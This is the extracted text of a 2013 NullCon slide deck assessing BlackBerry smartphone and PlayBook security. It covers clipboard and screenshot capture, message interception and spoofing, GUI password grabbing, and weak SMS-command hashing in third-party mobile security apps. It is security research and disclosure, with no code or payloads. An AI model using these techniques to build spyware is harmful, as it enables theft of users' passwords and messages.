YURY_CHEMERKIN__NullCon_2013_Conference.pdf

YURY_CHEMERKIN__NullCon_2013_Conference.pdf

• 1.
  SECURITYEVALUATIONORESCAPING FROM"VULNERABILITY PRISON" Ph.D. YURYCHEMERKIN NULLCON ‘GOA ‘2013
• 2.
  THE SECURITY ISTHE CORNERSTONE A POWERFUL HIGH LEVEL INTEGRATION  IMs, SOCIAL NETWORKS  FINANCIAL DATA AND ETC. THE BLACKBERRY WAS BUILT  FREE OF MALWARE & HARMFUL ACTIONS  WITH NATIVE SECURITY SOLUTIONS MAINLY FOCUSED ON ENTERPRISE  WIDE RANGE IT POLICY SET  UP TO 500 UNITS  A FEW THIRD PARTY SECURITY SOLUTIONS A SIMPLIFICATION OF THE SECURITY VISION POOR INTERGRATION (ONLY BLACKBERRY BRIDGE)  NO BUILT IMs, HTML5 & WEB-LAUNCHER  NO WALLETS OR ELSE BUILT APPLICATIONS PLAYBOOK MIGHT  PRODUCE FEW VALUE DATA DUE APIs  NOT MORE THAN LARGE PHONE’S SCREEN TOTALLY FOCUSED ON ENTERPRISE  IT POLICY EXTRA REDUCED  UP TO 10 UNITS  ENTERTAINMENT APPLICATIONS ONLY BLACKBERRYSECURITY ENVIRONMENT BLACKBERRY SMARTPHONE WASSECURE… PLAYBOOK HASCOMEWITHAPOORENVIROMENT
• 3.
   A LOTOF TYPES  BOOTKITS  FIRMWARE  USER-MODE  KERNEL  HYPERVISOR  SIMILAR TO THE SPYWARE  BUNDLING WITH DESIRABLE SOFTWARE  WIDESPREADING, EASY DITRIBUTION AND QUITE RELEVANT FOR HACKERS  BASED ON:  VENDOR-SUPPLIED EXTENSIONS  THIRD PARTY PLUGINS  PUBLIC INTERFACES  INTERCEPTION OF SYSTEMS MESSAGES  EXPLOITATION OF SECURITY VULNERABILITIES  HOOKING AND PATCHING OF APIs METHODS USERMODEROOTKITANDSPYWARE MALWAREBOUNDS BECOMEUNCLEAR… HACKERSAREINTERESTED INCHEAPERCOSTING
• 4.
   VIA THEBUILT (INTERNAL) EXPLORER  AFTER ENTERING THE PASSWORD BUT STILL THE INTERNAL EXPLORER  FOR EXECUTING MALWARE FROM THE DEVICE BY CLICKING FILE (.JAR/.JAD + .COD)  TO ALLOW COPYING THE MALWARE TO THE DEVICE AS AN EXTERNAL DRIVE (LIKE A WORM)  ALL DATA ACCESSIBLE EXCEPT APP & SYSTEM DATA WITHOUT ANY API & OTHER INFO  AFTER MOUNTING AS AN EXTERNAL DRIVE(-S)  AFTER ENTERING THE PASSWORD BUT IT IS NOT NECESSARY TO USE INTERNAL EXPLORER  TO PREVENT FROM EXECUTING ANYTHING OUTSIDE APPWORLD (.BAR)  MALWARE IS A PERSONAL APPLICATION SUBTYPE IN TERMS OF RIM’s SECURITY  SANDBOX PROTECTS ONLY APP DATA, WHILE USER DATA STORED IN SHARED FOLDERS THEFILESYSTEMISSUES BBOSv4–5WASACCESSIBLE BBOSV6–7PLUSPLAYBOOK AREACCESSIBLE
• 7.
   THE “UPGRADE”FEATURE MEANS  THE INSTALL & REMOVE ACTIONS AT LEAST  AN APPLICATION ID REQUIREMENT  AN ACCESSIBLE RUNNING APPLICATION LIST  HANDLING ANOTHER APPs SILENTLY VIA API  HANDLING ANOTHER APPLICATION SILENTLY VIA PC TOOLS  MAY NEED A PASSWORD  DEBUG MODE IS FOR TRACING & DEBUGING ONLY  EASY TRACKING THE NEWCOMING .COD MODULES FOR THE MALWARE PAYLOAD  THE “UPGRADE” MEANS AN USER INTERACTION  WITH APPWORLD  WITH HOME SCREEN  THERE ARE SOME APIs BUT DISABLED  THERE IS NO API FOR SUCH ACTIONS YET  HANDLING ANOTHER APPLICATION SILENTLY VIA PC TOOLS  MAY NEED A PASSWORD  STRONGLY NEED ACTIVATED A DEBUG MODE  LOOKS LIKE MORE SECURE THAN BLACKBERRY BUT DIFFICULT TO REMOVE DISTRIBUTED MALWARE THEAPPLICATION MANAGEMENT ISSUES BLACKBERRY SMARTPHONE (LESSTHANBB10) BLACKBERRY PLAYBOOK (PROBABLY BLACKBERRY 10)
• 9.
   HOW TOREVEAL THE DATA IN REAL TIME  GETCLIPBOARD()  ANY PROTECTION  NATIVE WALLETS RESTRICT THE CLIPBOARD ACCESS BY RETURNING “NULL”  WHILE THE APPLICATION IS ACTIVE (ON TOP OF SCREEN STACK) ONLY  DOES NOT WORK IN MINIMIZED STATE  HOW TO REVEAL THE DATA IN REAL TIME  GETDATA()  ANY PROTECTION  NO NATIVE WALLET APPLICATION  MANAGING THE LAST CLIPBOARD DATA VIA SHARED FOLDER  PLAIN TEXT  HTML  ETC. THECLIPBOARDISSUES BLACKBERRY SMARTPHONE BLACKBERRY PLAYBOOK
• 13.
   SCREEN PROTECTIONVIA SWITCHING  PERMIT  RESTRICT  ADDITIONALLY PER APPLICATION….  BUT DOES NOT HANDLE WINDOWs  HANDLE WITH THE KEY PREVIEW DUE THE VIRTUAL KEYBOARD  MAY BE IMPROVED BY XOR’ing TWO PHOTOSCREENS TO GET THE DIFFERENCE  MASKING THE ASTERISKS TAKES A DELAY  ENOUGH TO STEAL THE TEXT  MAY BE PART OF OCR ENGINES  ONLINE OR DESKTOP  RECOGNIZE TYPED DATA VERY QUICKLY  WAS TESTED ON ABBYY ONLINE OCR  SUBSTITUTE FOR HARDWARE KEYLLOGER  RUNNING DOWN THE BATTERRY MORE SLOWLY THAN PHOTO/VIDEO CAMERA  EASY ACCESS TO ANY APPLICATION…WALLET EVEN  NO RESTRICTION LIKE THE CLIPBOARD “NULL”  SCREENSHOTS OFTEN STORE IN CAMERA FOLDER  THE SAME A FILE ACCESS THEPHOTOSCREEN ISSUES AREAVAILABLE FORALLBLACKBERRY DEVICESBUTDISABLEDFORPLAYBOOK ANDBLACKBERRY 10YET
• 15.
   USING AUTHORIZEDAPI TO INTERCEPT  MESSAGES (BBM, EMAIL, PIN-TO-PIN)  CREATE THE MESSAGE  READ THE MESSAGE  DELETE THE MESSAGE  SET THE MESSAGE STATUS (UNREAD, SENT, ANY ERROR STATE, ETC.)  THE BUTTON EVENTS (THE SAME TYPES)  OPENING THE MESSAGE  FORWARDING THE MESSAGE  SENDING THE MESSAGE  INTERCEPTING THE SMS (BASICALLY)  RECEIVING AND SENDING EVENTS  DELETING THE SENT & RECEIVED SMS  ENOUGH TO HANDLE SOCIAL C&C SMS  OUTCOMING SMS (ADVANCED)  BLOCKING (DROPPING) THE SMS  A NOTIFICATION IN THE MESSAGE THREAD  SPOOFING  THE RECEPIENT  THE BODY  TRANSMISSION REFUSED BY … IF SUCH MESSAGE WAS NOT REMOVED THEMESSAGES ISSUES AVAILABLE ONTHEBBDEVICES PROBABLY ONTHEBLACKBERRY 10 NO3G,NOAPIFORPLAYBOOK
• 17.
   THE PASSWORDPROTECTION COVERS  DEVICE LOCKING & ENCRYPTION FEATURE  APPWORLD REQUEST  LIMITED BY 5/10 ATTEMPTS & WIPE THEN  WIPING THE INTERNAL STORAGE ONLY  EXTRACTING THE PASSWORD TRHOUGHT  ELCOMSOFT PRODUCT (CUSTOM CASE)  GUI VULNERABILITY  CREATING THE FAKE WINDOW ON DESKTOP SYNCHRONIZATION  BREAKING INTO BB DESKTOP SOFTWARE  HANDLING DESKTOP SOFTWARE VULNERABILITY  UNMASKING THE FIELD  GRABBING THE PASSWORD  MASKING THE FIELD  DELAY TAKES NOT MORE THAN 15 MSEC  AFFECTED PASSWORD TYPES  THE DEVICE PASSWORD  THE BACKUP PASSWORD  AFFECTED DEVICES  BLACKBERRY 4-7 (BB 10 HIGHLY PROBABLY)  BLACKBERRY PLAYBOOK THEDEVICE PASSWORDISSUES FORTHEBLACKBERRY 4–7DUETHEINTERNALCASE FORALLDEVICESDUEINTHEDESKTOP ACCESSCASE
• 20.
   INITIALLY BASEDON AUTHORIZED API COVERED  ALL PHYSICAL & NAVIGATION BUTTONS  TYPING THE TEXTUAL DATA  AFFECT ALL NATIVE & THIRD PARTY APPs  SECONDARY BASED ON ADDING THE MENU ITEMS  INTO THE GLOBAL MENU  INTO THE “SEND VIA” MENU  AFFECT ALL NATIVE APPLICATIONS  NATIVE APPLICATIONS ARE DEVELOPED BY RIM  BLACKBERRY WALLETS, MESSAGES, SETTINGS, FACEBOOK, TWITTER,…  BBM/GTALK/YAHOO/WINDOWS IMs,…  GUI EXPLOITATION HANDLES WITH  REDRAWING THE SCREENS  ADDING NEW GUI OBJECTS  CHANGING THEIR PROPERTIES  GRABBING THE TEXT FROM THE  ANY FIELDs (INCL. PASSWORD FIELD)  UNLOCK THE DEVICE’s FIELD  SETTING UP THE PASSWORD’s FIELD  ADDING, REMOVING THE FIELD DATA  ORIGINAL DATA IS INACCESSIBLE BUT NOT AFFECTED  GUI OBJECTS SHUFFLING IS NOT POSSIBLE THEGUIEXPLOITATION CONSEQUENCE OFWIDEINTERGRATION FEATURES OFFEREDFORDEVELOPERS (BLACKBERRY 4–7 ONLY)
• 25.
   KASPERSKY MOBILESECURITY PROVIDES  FIREWALL, WIPE, BLOCK, INFO FEATURES  NO PROTECTION FROM REMOVING.CODs  NO PROTECTION UNDER SIMULATOR  EXAMING THE TRAFFIC, BEHAVIOUR  SHOULD CHECK API “IS SIMULATOR”  SMS MANAGEMENT (“QUITE” SECRET SMS)  PASSWORD IS FOUR– SIXTEEN DIGITS SET  …AND CAN BE MODIFIED IN REAL-TIME  SMS IS A HALF A HASH VALUE OF GOST R 34.11-94  IMPLEMENTATION USES TEST CRYPTO VALUES AND NO SALT  TABLES (VALUEHASH) ARE EASY BUILT  OUTCOMING SMS CAN BE SPOOFED WITHOUT ANY NOTIFICATION  OUTCOMING SMS CAN BLOCK OR WIPE THE SAME DEVICE OR ANOTHER DEVICE  McAfee MOBILE SECURITY PROVIDES  FIREWALL, WIPE, BLOCK, INFO FEATURES  NO PROTECTION FROM REMOVING.CODs  NO PROTECTION UNDER SIMULATOR  EXAMING THE TRAFFIC, BEHAVIOUR  SHOULD CHECK API “IS SIMULATOR”  WEB MANAGEMENT CONSOLE  DIFFICULT TO BREAK SMS C&C THETHIRDPARTYEXPLOITATION THEREAREAFEWOFTHEM THEYMIGHTHAVEANEXPLOIT BUT RUINNATIVEASECURITY
• 26.
   DENIAL OFSERVICE  REPLACING/REMOVING EXEC FILES  DOS’ing EVENTs,NOISING FIELDS  GUI INTERCEPT  INFORMATION DISCLOSURE  CLIPBOARD, SCREEN CAPTURE  GUI INTERCEPT  DUMPING .COD FILES, SHARED FILES  MITM (INTERCEPTION / SPOOFING)  MESSAGES  GUI INTERCEPT,THIRD PARTY APPs  FAKE WINDOW/CLICKJACKING  GENERAL PERMISSIONS  INSTEAD OF SPECIFIC SUB-PERMISSIONS  A FEW NOTIFICATION/EVENT LOGs FOR USER  BUILT PER APPLICATION INSTEAD OF APP SCREENs  CONCRETE PERMISSIONS  BUT COMBINED INTO GENERAL PERMISSION  A SCREENSHOT PERMISSION IS PART OF THE CAMERA  GENERAL PERMISSIONS  INSTEADOF SPECIFIC SUB-PERMISSIONS  A FEW NOTIFICATION/EVENT LOGs FOR USER  BUILT PER APPLICATION INSTEAD OF APP SCREENs THEPERMISSIONS PRIVILEGED GENERALPERMISSIONS OWNAPPs,NATIVE&3RD PARTYAPPs FEATURES
• 27.
   SIMPLIFICATION ANDREDUCING SECURITY CONTROLS  MANY GENERAL PERMISSIONS AND COMBINED INTO EACH OTHER  NO LOGs ACTIVITY FOR SUB-PERMISSIONS TO PROVE THE TRANSPARENCY  ANY SECURITY VULNERABILITY ARE ONLY FIXED BY ENTIRELY NEW AND DIFFERENT OS / KERNEL  A FEW PERMISSIONs ARE CLOSED TO THE USER ACTIONS  THE SANDBOX PROTECT ONLY APPLICATION DATA  USERS HAVE TO STORE THEIR DATA INTO SHARED FOLDERS OR EXTERNAL STORAGE  APPLICATIONS CONTINUE STORE DATA IN PUBLIC FOLDERs BECAUSE GOVERNED BY CHANCE OF AVAILABILITY  MITM / INTERCEPTION ACTIONS ARE OFTEN SILENTLY  THE NATIVE SPOOFING AND INTERCEPTION FEATURES  BLACKBERRY ENTERPRISE SOLUTION / BLACKBERRY MOBILE FUSION IS NOT EFFECTIVE MUCH  THE BEST SECURITY (PERMISSIONS) RULED BY AMAZON WEB SERVICES  PERMISSIONS SHOULD RELY ON THE DIFFERENT USEFUL CASES SET INSTEAD OF SPECIFIC PERMISSION LIST CONCLUSION THEVENDORSECURITYVISION HASNOTHING WITHREALITY AGGRAVATED BYSIMPLICITY
• 28.
  THANKYOU YURY CHEMERKIN